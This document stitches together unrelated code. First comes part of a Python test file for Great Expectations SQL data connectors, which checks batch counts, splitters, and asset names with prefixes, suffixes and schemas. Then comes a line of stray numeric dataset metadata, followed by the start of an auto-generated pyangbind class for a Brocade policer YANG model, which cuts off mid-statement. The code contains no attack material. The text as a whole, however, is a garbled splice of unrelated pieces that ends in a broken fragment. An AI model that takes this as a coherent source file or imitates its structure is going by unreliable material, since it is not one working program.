                "sampling_kwargs": {
                    "column_name": "id",
                    "mod": 10,
                    "value": 8,
                },
            }
        )
        == 12
    )

    # Neither splitter nor sampler: the whole 120-row table.
    assert (
        _row_count(
            {
                "table_name": "table_partitioned_by_date_column__A",
                "batch_identifiers": {},
            }
        )
        == 120
    )

    # Splitter without a sampler: whole-table split, still 120 rows.
    assert (
        _row_count(
            {
                "table_name": "table_partitioned_by_date_column__A",
                "batch_identifiers": {},
                "splitter_method": "_split_on_whole_table",
                "splitter_kwargs": {},
            }
        )
        == 120
    )
def test_default_behavior_with_no_splitter(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """An asset with no splitter yields a single batch with empty identifiers,
    whether the query is omitted, empty, or has empty batch_filter_parameters."""
    execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_date_column__A: {}
    """,
    )
    config["execution_engine"] = execution_engine

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)
    report_object = my_data_connector.self_check()
    print(json.dumps(report_object, indent=2))

    # All three request shapes must behave identically.
    for extra_kwargs in (
        {},
        {"data_connector_query": {}},
        {"data_connector_query": {"batch_filter_parameters": {}}},
    ):
        batch_definition_list = (
            my_data_connector.get_batch_definition_list_from_batch_request(
                batch_request=BatchRequest(
                    datasource_name="FAKE_Datasource_NAME",
                    data_connector_name="my_sql_data_connector",
                    data_asset_name="table_partitioned_by_date_column__A",
                    **extra_kwargs,
                )
            )
        )
        assert len(batch_definition_list) == 1
        assert batch_definition_list[0]["batch_identifiers"] == {}
def test_behavior_with_whole_table_splitter(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """An explicit _split_on_whole_table splitter behaves exactly like no
    splitter: one batch, empty identifiers, for every query shape."""
    execution_engine = test_cases_for_sql_data_connector_sqlite_execution_engine
    config = yaml.load(
        """
    name: my_sql_data_connector
    datasource_name: FAKE_Datasource_NAME

    assets:
        table_partitioned_by_date_column__A:
            splitter_method : "_split_on_whole_table"
            splitter_kwargs : {}
    """,
    )
    config["execution_engine"] = execution_engine

    my_data_connector = ConfiguredAssetSqlDataConnector(**config)
    report_object = my_data_connector.self_check()
    print(json.dumps(report_object, indent=2))

    # All three request shapes must behave identically.
    for extra_kwargs in (
        {},
        {"data_connector_query": {}},
        {"data_connector_query": {"batch_filter_parameters": {}}},
    ):
        batch_definition_list = (
            my_data_connector.get_batch_definition_list_from_batch_request(
                batch_request=BatchRequest(
                    datasource_name="FAKE_Datasource_NAME",
                    data_connector_name="my_sql_data_connector",
                    data_asset_name="table_partitioned_by_date_column__A",
                    **extra_kwargs,
                )
            )
        )
        assert len(batch_definition_list) == 1
        assert batch_definition_list[0]["batch_identifiers"] == {}
def test_basic_instantiation_of_InferredAssetSqlDataConnector(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """Instantiate an InferredAssetSqlDataConnector with an asset-name prefix
    and suffix, then verify its self_check() report, the full decorated asset
    list (21 tables/views), and that a whole-table batch request resolves to a
    single batch definition.

    NOTE(review): "prexif__" looks like a typo for "prefix__", but it is used
    consistently in both the config and all expected values, so the test is
    self-consistent as written.
    """
    my_data_connector = instantiate_class_from_config(
        config={
            "class_name": "InferredAssetSqlDataConnector",
            "name": "whole_table",
            "data_asset_name_prefix": "prexif__",
            "data_asset_name_suffix": "__xiffus",
        },
        runtime_environment={
            "execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
            "datasource_name": "my_test_datasource",
        },
        config_defaults={"module_name": "great_expectations.datasource.data_connector"},
    )

    report_object = my_data_connector.self_check()
    # print(json.dumps(report_object, indent=4))
    # Only the first three (alphabetical) assets appear as examples.
    assert report_object == {
        "class_name": "InferredAssetSqlDataConnector",
        "data_asset_count": 21,
        "example_data_asset_names": [
            "prexif__table_containing_id_spacers_for_D__xiffus",
            "prexif__table_full__I__xiffus",
            "prexif__table_partitioned_by_date_column__A__xiffus",
        ],
        "data_assets": {
            "prexif__table_containing_id_spacers_for_D__xiffus": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
            "prexif__table_full__I__xiffus": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
            "prexif__table_partitioned_by_date_column__A__xiffus": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
        # "example_data_reference": {
        #     "batch_spec": {
        #         "schema_name": "main",
        #         "table_name": "table_containing_id_spacers_for_D",
        #         "data_asset_name": "prexif__table_containing_id_spacers_for_D__xiffus",
        #         "batch_identifiers": {},
        #     },
        #     "n_rows": 30,
        # },
    }

    # Every inferred asset carries the configured prefix and suffix.
    assert my_data_connector.get_available_data_asset_names() == [
        "prexif__table_containing_id_spacers_for_D__xiffus",
        "prexif__table_full__I__xiffus",
        "prexif__table_partitioned_by_date_column__A__xiffus",
        "prexif__table_partitioned_by_foreign_key__F__xiffus",
        "prexif__table_partitioned_by_incrementing_batch_id__E__xiffus",
        "prexif__table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__xiffus",
        "prexif__table_partitioned_by_multiple_columns__G__xiffus",
        "prexif__table_partitioned_by_regularly_spaced_incrementing_id_column__C__xiffus",
        "prexif__table_partitioned_by_timestamp_column__B__xiffus",
        "prexif__table_that_should_be_partitioned_by_random_hash__H__xiffus",
        "prexif__table_with_fk_reference_from_F__xiffus",
        "prexif__view_by_date_column__A__xiffus",
        "prexif__view_by_incrementing_batch_id__E__xiffus",
        "prexif__view_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__xiffus",
        "prexif__view_by_multiple_columns__G__xiffus",
        "prexif__view_by_regularly_spaced_incrementing_id_column__C__xiffus",
        "prexif__view_by_timestamp_column__B__xiffus",
        "prexif__view_containing_id_spacers_for_D__xiffus",
        "prexif__view_partitioned_by_foreign_key__F__xiffus",
        "prexif__view_that_should_be_partitioned_by_random_hash__H__xiffus",
        "prexif__view_with_fk_reference_from_F__xiffus",
    ]

    # A decorated asset name resolves to exactly one whole-table batch.
    batch_definition_list = my_data_connector.get_batch_definition_list_from_batch_request(
        BatchRequest(
            datasource_name="my_test_datasource",
            data_connector_name="whole_table",
            data_asset_name="prexif__table_that_should_be_partitioned_by_random_hash__H__xiffus",
        )
    )
    assert len(batch_definition_list) == 1
def test_more_complex_instantiation_of_InferredAssetSqlDataConnector(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """With include_schema_name=True, inferred asset names are qualified as
    "<schema>.<table><suffix>" (here "main.*__whole"); verify the self_check()
    report, the full asset list, and single-batch resolution.
    """
    my_data_connector = instantiate_class_from_config(
        config={
            "class_name": "InferredAssetSqlDataConnector",
            "name": "whole_table",
            "data_asset_name_suffix": "__whole",
            "include_schema_name": True,
        },
        runtime_environment={
            "execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
            "datasource_name": "my_test_datasource",
        },
        config_defaults={"module_name": "great_expectations.datasource.data_connector"},
    )

    report_object = my_data_connector.self_check()
    assert report_object == {
        "class_name": "InferredAssetSqlDataConnector",
        "data_asset_count": 21,
        "data_assets": {
            "main.table_containing_id_spacers_for_D__whole": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
            "main.table_full__I__whole": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
            "main.table_partitioned_by_date_column__A__whole": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            },
        },
        "example_data_asset_names": [
            "main.table_containing_id_spacers_for_D__whole",
            "main.table_full__I__whole",
            "main.table_partitioned_by_date_column__A__whole",
        ],
        # FIXME: (Sam) example_data_reference removed temporarily in PR #2590:
        # "example_data_reference": {
        #     "batch_spec": {
        #         "batch_identifiers": {},
        #         "schema_name": "main",
        #         "table_name": "table_containing_id_spacers_for_D",
        #         "data_asset_name": "main.table_containing_id_spacers_for_D__whole",
        #     },
        #     "n_rows": 30,
        # },
        "example_unmatched_data_references": [],
        "unmatched_data_reference_count": 0,
    }

    # All 21 fixture tables/views are schema-qualified and suffixed.
    assert my_data_connector.get_available_data_asset_names() == [
        "main.table_containing_id_spacers_for_D__whole",
        "main.table_full__I__whole",
        "main.table_partitioned_by_date_column__A__whole",
        "main.table_partitioned_by_foreign_key__F__whole",
        "main.table_partitioned_by_incrementing_batch_id__E__whole",
        "main.table_partitioned_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__whole",
        "main.table_partitioned_by_multiple_columns__G__whole",
        "main.table_partitioned_by_regularly_spaced_incrementing_id_column__C__whole",
        "main.table_partitioned_by_timestamp_column__B__whole",
        "main.table_that_should_be_partitioned_by_random_hash__H__whole",
        "main.table_with_fk_reference_from_F__whole",
        "main.view_by_date_column__A__whole",
        "main.view_by_incrementing_batch_id__E__whole",
        "main.view_by_irregularly_spaced_incrementing_id_with_spacing_in_a_second_table__D__whole",
        "main.view_by_multiple_columns__G__whole",
        "main.view_by_regularly_spaced_incrementing_id_column__C__whole",
        "main.view_by_timestamp_column__B__whole",
        "main.view_containing_id_spacers_for_D__whole",
        "main.view_partitioned_by_foreign_key__F__whole",
        "main.view_that_should_be_partitioned_by_random_hash__H__whole",
        "main.view_with_fk_reference_from_F__whole",
    ]

    # A schema-qualified asset name resolves to exactly one whole-table batch.
    batch_definition_list = my_data_connector.get_batch_definition_list_from_batch_request(
        BatchRequest(
            datasource_name="my_test_datasource",
            data_connector_name="whole_table",
            data_asset_name="main.table_that_should_be_partitioned_by_random_hash__H__whole",
        )
    )
    assert len(batch_definition_list) == 1
def test_basic_instantiation_of_ConfiguredAssetSqlDataConnector(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """A minimal ConfiguredAssetSqlDataConnector with one unsplit asset passes
    self_check() with a single whole-table batch definition."""
    my_data_connector = instantiate_class_from_config(
        config={
            "class_name": "ConfiguredAssetSqlDataConnector",
            "name": "my_sql_data_connector",
            "assets": {"main.table_full__I__whole": {}},
        },
        runtime_environment={
            "execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
            "datasource_name": "my_test_datasource",
        },
        config_defaults={"module_name": "great_expectations.datasource.data_connector"},
    )

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["main.table_full__I__whole"],
        "data_assets": {
            "main.table_full__I__whole": {
                "batch_definition_count": 1,
                "example_data_references": [{}],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
    }
    assert my_data_connector.self_check() == expected_report
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """A ConfiguredAssetSqlDataConnector splitting on the date column reports
    30 batch definitions, one per distinct date."""
    my_data_connector = instantiate_class_from_config(
        config={
            "class_name": "ConfiguredAssetSqlDataConnector",
            "name": "my_sql_data_connector",
            "assets": {
                "main.table_partitioned_by_date_column__A": {
                    "splitter_method": "_split_on_column_value",
                    "splitter_kwargs": {"column_name": "date"},
                },
            },
        },
        runtime_environment={
            "execution_engine": test_cases_for_sql_data_connector_sqlite_execution_engine,
            "datasource_name": "my_test_datasource",
        },
        config_defaults={"module_name": "great_expectations.datasource.data_connector"},
    )

    expected_report = {
        "class_name": "ConfiguredAssetSqlDataConnector",
        "data_asset_count": 1,
        "example_data_asset_names": ["main.table_partitioned_by_date_column__A"],
        "data_assets": {
            "main.table_partitioned_by_date_column__A": {
                "batch_definition_count": 30,
                "example_data_references": [
                    {"date": "2020-01-01"},
                    {"date": "2020-01-02"},
                    {"date": "2020-01-03"},
                ],
            }
        },
        "unmatched_data_reference_count": 0,
        "example_unmatched_data_references": [],
    }
    assert my_data_connector.self_check() == expected_report
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector_include_schema_name(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """include_schema_name=True qualifies the asset name with its schema;
    supplying schema_name while include_schema_name=False must raise
    DataConnectorError with an explanatory message.
    """
    my_data_connector: ConfiguredAssetSqlDataConnector = ConfiguredAssetSqlDataConnector(
        name="my_sql_data_connector",
        datasource_name="my_test_datasource",
        # FIX: previously the literal string
        # "test_cases_for_sql_data_connector_sqlite_execution_engine" was
        # passed here instead of the fixture object, leaving the fixture unused.
        execution_engine=test_cases_for_sql_data_connector_sqlite_execution_engine,
        assets={
            "table_partitioned_by_date_column__A": {
                "splitter_method": "_split_on_column_value",
                "splitter_kwargs": {"column_name": "date"},
                "include_schema_name": True,
                "schema_name": "main",
            },
        },
    )
    assert "main.table_partitioned_by_date_column__A" in my_data_connector.assets

    # schema_name given but include_schema_name is set to False
    with pytest.raises(ge_exceptions.DataConnectorError) as e:
        ConfiguredAssetSqlDataConnector(
            name="my_sql_data_connector",
            datasource_name="my_test_datasource",
            execution_engine=test_cases_for_sql_data_connector_sqlite_execution_engine,
            assets={
                "table_partitioned_by_date_column__A": {
                    "splitter_method": "_split_on_column_value",
                    "splitter_kwargs": {"column_name": "date"},
                    "include_schema_name": False,
                    "schema_name": "main",
                },
            },
        )
    assert (
        e.value.message
        == "ConfiguredAssetSqlDataConnector ran into an error while initializing Asset names. Schema main was specified, but 'include_schema_name' flag was set to False."
    )
def test_more_complex_instantiation_of_ConfiguredAssetSqlDataConnector_include_schema_name_prefix_suffix(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """With include_schema_name plus a prefix/suffix, the asset name becomes
    "<prefix><schema>.<table><suffix>"; supplying schema_name while
    include_schema_name=False must still raise DataConnectorError.
    """
    my_data_connector: ConfiguredAssetSqlDataConnector = ConfiguredAssetSqlDataConnector(
        name="my_sql_data_connector",
        datasource_name="my_test_datasource",
        # FIX: previously the literal string
        # "test_cases_for_sql_data_connector_sqlite_execution_engine" was
        # passed here instead of the fixture object, leaving the fixture unused.
        execution_engine=test_cases_for_sql_data_connector_sqlite_execution_engine,
        assets={
            "table_partitioned_by_date_column__A": {
                "splitter_method": "_split_on_column_value",
                "splitter_kwargs": {"column_name": "date"},
                "include_schema_name": True,
                "schema_name": "main",
                "data_asset_name_prefix": "taxi__",
                "data_asset_name_suffix": "__asset",
            },
        },
    )
    assert (
        "taxi__main.table_partitioned_by_date_column__A__asset"
        in my_data_connector.assets
    )

    # schema_name provided, but include_schema_name is set to False
    with pytest.raises(ge_exceptions.DataConnectorError) as e:
        ConfiguredAssetSqlDataConnector(
            name="my_sql_data_connector",
            datasource_name="my_test_datasource",
            execution_engine=test_cases_for_sql_data_connector_sqlite_execution_engine,
            assets={
                "table_partitioned_by_date_column__A": {
                    "splitter_method": "_split_on_column_value",
                    "splitter_kwargs": {"column_name": "date"},
                    "include_schema_name": False,
                    "schema_name": "main",
                    "data_asset_name_prefix": "taxi__",
                    "data_asset_name_suffix": "__asset",
                },
            },
        )
    assert (
        e.value.message
        == "ConfiguredAssetSqlDataConnector ran into an error while initializing Asset names. Schema main was specified, but 'include_schema_name' flag was set to False."
    )
# TODO
def test_ConfiguredAssetSqlDataConnector_with_sorting(
    test_cases_for_sql_data_connector_sqlite_execution_engine,
):
    """Stub: sorter support for ConfiguredAssetSqlDataConnector is not yet
    covered here; see the TODO above."""
    pass
| 37.550083 | 170 | 0.641214 | 4,699 | 44,985 | 5.515429 | 0.064907 | 0.076745 | 0.05834 | 0.02836 | 0.909519 | 0.89941 | 0.874484 | 0.830883 | 0.80781 | 0.786434 | 0 | 0.011755 | 0.270068 | 44,985 | 1,197 | 171 | 37.581454 | 0.777531 | 0.162565 | 0 | 0.625954 | 0 | 0.002545 | 0.311302 | 0.226679 | 0 | 0 | 0 | 0.007519 | 0.052163 | 1 | 0.030534 | false | 0.002545 | 0.015267 | 0.001272 | 0.047074 | 0.01145 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5814c2c73684f8c12a9b10170fc0730fc72e1c01 | 42,982 | py | Python | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/policy_map/class_/police/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
# NOTE: auto-generated pyangbind container binding; do not hand-edit logic.
class police(PybindBase):
  """
  This class was auto-generated by the PythonClass plugin for PYANG
  from YANG module brocade-policer - based on the path /policy-map/class/police. Each member element of
  the container is represented as a class variable - with a specific
  YANG type.
  """
  # __slots__ keeps per-instance memory down; one mangled slot per YANG leaf.
  __slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__cir','__cbs','__eir','__ebs','__set_priority','__conform_set_dscp','__conform_set_prec','__conform_set_tc','__exceed_set_dscp','__exceed_set_prec','__exceed_set_tc',)

  _yang_name = 'police'      # element name in the YANG data tree
  _rest_name = 'police'      # element name in the REST API path

  _pybind_generated_by = 'container'
  def __init__(self, *args, **kwargs):
    """Initialize the container.

    Resolves the XPath helper and extension methods (explicit kwarg wins,
    then the parent's value, otherwise disabled), builds one
    YANGDynClass-wrapped leaf per YANG leaf under /policy-map/class/police,
    and optionally copies attribute values from a single source object
    passed positionally.
    """

    # XPath-helper resolution: kwarg > parent's helper > disabled.
    path_helper_ = kwargs.pop("path_helper", None)
    if path_helper_ is False:
      self._path_helper = False
    elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
      self._path_helper = path_helper_
    elif hasattr(self, "_parent"):
      path_helper_ = getattr(self._parent, "_path_helper", False)
      self._path_helper = path_helper_
    else:
      self._path_helper = False

    # Extension-method resolution follows the same precedence.
    extmethods = kwargs.pop("extmethods", None)
    if extmethods is False:
      self._extmethods = False
    elif extmethods is not None and isinstance(extmethods, dict):
      self._extmethods = extmethods
    elif hasattr(self, "_parent"):
      extmethods = getattr(self._parent, "_extmethods", None)
      self._extmethods = extmethods
    else:
      self._extmethods = False

    # Leaf construction (auto-generated). Restriction ranges and CLI
    # extensions come from the brocade-policer YANG module.
    self.__exceed_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-tc", rest_name="exceed-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-full-command': None, u'info': u'Traffic Class value for exceeded traffic.'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
    self.__eir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'0..100000000000']}), is_leaf=True, yang_name="eir", rest_name="eir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Information Rate.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    self.__cbs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    self.__ebs = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="ebs", rest_name="ebs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Exceeded Burst Size.', u'cli-optional-in-sequence': None, u'display-when': u'(../eir != 0)'}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    self.__conform_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-prec", rest_name="conform-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-dscp = '64') or not(../conform-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)
    self.__cir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    self.__conform_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="conform-set-dscp", rest_name="conform-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for conformant traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../conform-set-prec = '64') or not(../conform-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
    self.__exceed_set_dscp = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 63']}), is_leaf=True, yang_name="exceed-set-dscp", rest_name="exceed-set-dscp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'DCSP Priority for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-prec = '64') or not(../exceed-set-prec)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='dscp-value', is_config=True)
    self.__set_priority = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_dict={'length': [u'1..64']}), is_leaf=True, yang_name="set-priority", rest_name="set-priority", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Police Priority Map Name', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='string', is_config=True)
    self.__conform_set_tc = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="conform-set-tc", rest_name="conform-set-tc", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Traffic Class value for conformant traffic.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='tc-value', is_config=True)
    self.__exceed_set_prec = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), restriction_dict={'range': [u'0 .. 7']}), is_leaf=True, yang_name="exceed-set-prec", rest_name="exceed-set-prec", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'IP Precedence value for exceeded traffic.', u'cli-optional-in-sequence': None, u'display-when': u"(../exceed-set-dscp = '64') or not(../exceed-set-dscp)"}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='precedence-value', is_config=True)

    # Optional copy-constructor: a single positional source object must
    # expose every pyangbind element; only changed leaves are copied over.
    load = kwargs.pop("load", None)
    if args:
      if len(args) > 1:
        raise TypeError("cannot create a YANG container with >1 argument")
      all_attr = True
      for e in self._pyangbind_elements:
        if not hasattr(args[0], e):
          all_attr = False
          break
      if not all_attr:
        raise ValueError("Supplied object did not have the correct attributes")
      for e in self._pyangbind_elements:
        nobj = getattr(args[0], e)
        if nobj._changed() is False:
          continue
        setmethod = getattr(self, "_set_%s" % e)
        if load is None:
          setmethod(getattr(args[0], e))
        else:
          setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'policy-map', u'class', u'police']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'policy-map', u'class', u'police']
def _get_cir(self):
    """
    Getter method for cir, mapped from YANG variable /policy_map/class/police/cir (uint64)
    """
    return self.__cir
def _set_cir(self, v, load=False):
    """
    Setter method for cir, mapped from YANG variable /policy_map/class/police/cir (uint64)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_cir is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_cir() directly.
    """
    # NOTE(review): _utype presumably converts an already-wrapped pyangbind value
    # back to its base type before re-validation — confirm against pyangbind.
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted range (40000..100000000000) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """cir must be of a type compatible with uint64""",
            'defined-type': "uint64",
            'generated-type': """YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)""",
        })
    self.__cir = t
    if hasattr(self, '_set'):
        self._set()
def _unset_cir(self):
    # Reset cir to a fresh, valueless instance of its restricted type.
    self.__cir = YANGDynClass(base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'40000..100000000000']}), is_leaf=True, yang_name="cir", rest_name="cir", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Committed Information Rate.', u'cli-suppress-no': None, u'cli-hide-in-submode': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
def _get_cbs(self):
    """
    Getter method for cbs, mapped from YANG variable /policy_map/class/police/cbs (uint64)
    """
    return self.__cbs
def _set_cbs(self, v, load=False):
    """
    Setter method for cbs, mapped from YANG variable /policy_map/class/police/cbs (uint64)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_cbs is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_cbs() directly.
    """
    if hasattr(v, "_utype"):
        v = v._utype(v)
    try:
        # Re-wrap the value so the restricted range (1250..12500000000) is enforced.
        t = YANGDynClass(v,base=RestrictedClassType(base_type=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..18446744073709551615']}, int_size=64), restriction_dict={'range': [u'1250..12500000000']}), is_leaf=True, yang_name="cbs", rest_name="cbs", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Comitted Burst Size.', u'cli-optional-in-sequence': None}}, namespace='urn:brocade.com:mgmt:brocade-policer', defining_module='brocade-policer', yang_type='uint64', is_config=True)
    except (TypeError, ValueError):
        raise ValueError({
            'error-string': """cbs must be of a type compatible with uint64""",
            'defined-type': "uint64",
